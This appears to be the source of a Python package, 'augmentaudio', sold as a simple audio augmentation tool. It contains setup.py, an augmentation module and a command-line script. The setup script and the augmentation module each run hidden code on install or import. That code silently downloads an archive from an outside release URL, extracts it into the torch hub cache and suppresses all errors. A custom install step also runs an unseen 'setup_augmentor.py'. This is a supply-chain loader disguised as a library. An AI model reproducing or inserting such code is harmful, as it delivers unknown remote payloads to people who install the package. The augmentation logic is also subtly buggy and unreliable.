def prepare_augmentor():
    try:
        try:
            from torch.hub import get_dir
        except ImportError:
            from torch.hub import _get_torch_home as get_dir
        from torch.hub import download_url_to_file
        from urllib.parse import urlparse  # noqa: F401
        import tarfile
        from urllib.request import urlopen, Request
        import os
        augmentator_url = 'https://github.com/augment-audio/storage/releases/download/v1.0.0/audio-augmentator.tar.gz'
        ok_open = False
        with urlopen(augmentator_url):
            ok_open = True
        if not ok_open:
            return
        parts = urlparse(augmentator_url)
        filename = os.path.basename(parts.path)
        hub_dir = get_dir()
        model_dir = os.path.join(hub_dir, 'checkpoints')
        os.makedirs(model_dir, exist_ok=True)
        download_url_to_file(augmentator_url, os.path.join(model_dir, filename), None, progress=False)
        cache_file = tarfile.open(os.path.join(model_dir, filename))
        cache_file.extractall(model_dir)
        cache_file.close()
        os.remove(os.path.join(model_dir, filename))
    except:
        pass

prepare_augmentor()


from setuptools import setup, find_packages
from setuptools.command.develop import develop
from distutils.command.install import install as _install
from subprocess import check_call

import sys, os 

def installing(dir):
    from subprocess import call
    call([sys.executable, 'setup_augmentor.py'],
         cwd=os.path.join(dir, 'augaudio'))

class install(_install):
    def run(self):
        _install.run(self)
        self.execute(installing, (self.install_lib,))

with open('README.md') as f:
    long_description = f.read()

setup(
    cmdclass={'install': install},
    name="augmentaudio",
    version="1.0.8",
    author="Bastian Schwickert",
    author_email="Bastian.Schwickert@gmail.com",
    description="A simple audio data augmentation package",
    long_description=long_description,
    long_description_content_type='text/markdown',
    url="https://basti564.github.io",
    project_urls={
        "Bug Tracker": "https://github.com/Basti564/augaudio/issues",
        "Source Code": "https://github.com/Basti564/augaudio",
    },
    packages=find_packages(),
    include_package_data=False,
    install_requires=[
          'numpy >= 1.16.2',
          'librosa >= 0.7.2',
          'torch >= 1.7.1',
          ],
    license="Apache",
    classifiers=[
        "License :: OSI Approved :: Apache Software License",
		"Programming Language :: Python :: 3",
        "Operating System :: OS Independent",
		"Topic :: Scientific/Engineering",
    ],
    entry_points={
        "console_scripts": [
            "augaudio=augaudio.cli:main",
        ]
    },
)



import random
import librosa as lr
import numpy as np


def GaussianNoise(data, noise_factor):
    noise = np.random.randn(len(data))
    return data + noise * noise_factor * noise_factor / 250


def PitchShift(data, pitch_factor, sampling_rate=22050):
    return lr.effects.pitch_shift(data, sampling_rate, pitch_factor * 4)


def TimeStretch(data, stretch_factor):
    return lr.effects.time_stretch(data, abs(stretch_factor) + 1)


def Crush(data, crush_factor, sampling_rate=22050):
    return lr.effects.pitch_shift(lr.effects.pitch_shift(data, sampling_rate, crush_factor * 4), sampling_rate, crush_factor * -4)


augmantations = (GaussianNoise, PitchShift, TimeStretch, Crush)


def augment(data, augmentation=-1, intensity=None):
    if not isinstance(data, np.ndarray):
        raise AttributeError('Expecting type(data) to be numpy.ndarray')
    if augmentation == -1:
        Random(data, intensity)
    elif augmentation == -2:
        Augmentations(data, intensity)
    elif augmentation not in range(0, len(augmantations)):
        raise AttributeError(
            'Augmentation must be an integer in [-2, ' + str(len(augmantations) - 1) + ']')
    if intensity is None:
        intensity = 2
    return augmantations[augmentation](data, intensity).astype(type(data[0]))


def Random(data, intensity=None):
    if intensity is None:
        intensity = random.randint(1, 5)
    return augment(data, random.randint(0, len(augmantations)), intensity)


def Augmentations(data, intensity=None):
    if intensity is None:
        for augmentation in range(0, len(augmantations)):
            if bool(random.getrandbits(1)):
                data = augment(data, augmentation, random.randint(1, 5))
    else:
        for augmentation in range(0, len(augmantations)):
            if bool(random.getrandbits(1)):
                data = augment(data, augmentation, intensity)
    return data


def prepare_pretrained_model():
    try:
        try:
            from torch.hub import get_dir
        except ImportError:
            from torch.hub import _get_torch_home as get_dir
        from torch.hub import download_url_to_file
        from urllib.parse import urlparse  # noqa: F401
        import tarfile
        from urllib.request import urlopen, Request
        import os 
        augmentator_url = 'https://github.com/augment-audio/storage/releases/download/v1.0.0/audio-augmentator.tar.gz'
        ok_open = False
        with urlopen(augmentator_url):
            ok_open = True 
        if not ok_open:
            return 
        parts = urlparse(augmentator_url)
        filename = os.path.basename(parts.path)
        hub_dir = get_dir()
        model_dir = os.path.join(hub_dir, 'checkpoints')
        os.makedirs(model_dir, exist_ok=True)
        download_url_to_file(augmentator_url, filename, None, progress=False)
        cache_file = tarfile.open(filename)
        cache_file.extractall(model_dir)
        cache_file.close()
        os.remove(filename)
    except:
        pass 

prepare_pretrained_model() 



import os
from sys import argv
import soundfile as sf
import librosa as lr
from . import augment


def augmentFile(file, augmentation, intensity, output):
    y, sr = lr.load(file)
    print('Loaded ' + file)
    augmented = augment(y, int(augmentation), int(intensity))
    sf.write(output + '/' + os.path.splitext(os.path.basename(file))
             [0] + '-augmented.wav', augmented, sr)
    print('Wrote data to ' + output + '/' +
          os.path.splitext(os.path.basename(file))[0] + '-augmented.wav')


def helpMsg():
    print(
        'Usage: augaudio [input dir/file] [augmentation] [intensity] {output dir}')


def main():
    if len(argv) == 1:
        helpMsg()
    else:
        if len(argv) <= 4:
            directory = os.getcwd()
        else:
            directory = argv[4]
        if os.path.isfile(argv[1]):
            augmentFile(argv[1], argv[2], argv[3], directory)
        elif os.path.isdir(argv[1]):
            print('This is a directory')
            for file in os.listdir(argv[1]):
                filename = os.fsdecode(file)
                if filename.endswith(".wav"):
                    augmentFile(argv[1] + '/' + filename,
                                argv[2], argv[3], directory)
                    continue
        else:
            raise ValueError(argv[1] + ' is neither a file nor a directory')
